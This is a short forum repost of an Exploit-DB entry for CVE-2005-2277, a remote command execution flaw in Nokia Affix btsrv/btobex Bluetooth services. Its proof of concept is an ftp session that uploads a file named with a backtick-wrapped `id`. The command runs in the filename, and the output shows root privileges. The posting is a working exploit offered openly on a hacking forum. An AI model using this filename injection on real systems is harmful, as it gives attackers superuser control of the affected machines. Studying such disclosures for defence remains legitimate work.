Exploit Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25966
Проверка EDB
  1. Пройдено
Автор
KEVIN FINISTERRE
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
cve-2005-2277
Дата публикации
2005-07-12
Код:
source: https://www.securityfocus.com/bid/14232/info

Nokia Affix btsrv/btobex are reported prone to a remote command execution vulnerability. The issue exists due to a lack of input sanitization that is performed before using attacker-controlled data in a 'system()' call.

Because the affected services run with superuser privileges, this issue may be exploited to fully compromise a target computer that is running the affected software.

ftp> put /etc/hosts `id`
Transfer started...
Transfer complete.
257 bytes sent in 0.9 secs (2855.56 B/s)
ftp> ls
-rwdx 257 uid=0(root) gid=0(root) groups=0(root)
Command complete.
 
Источник
www.exploit-db.com

Похожие темы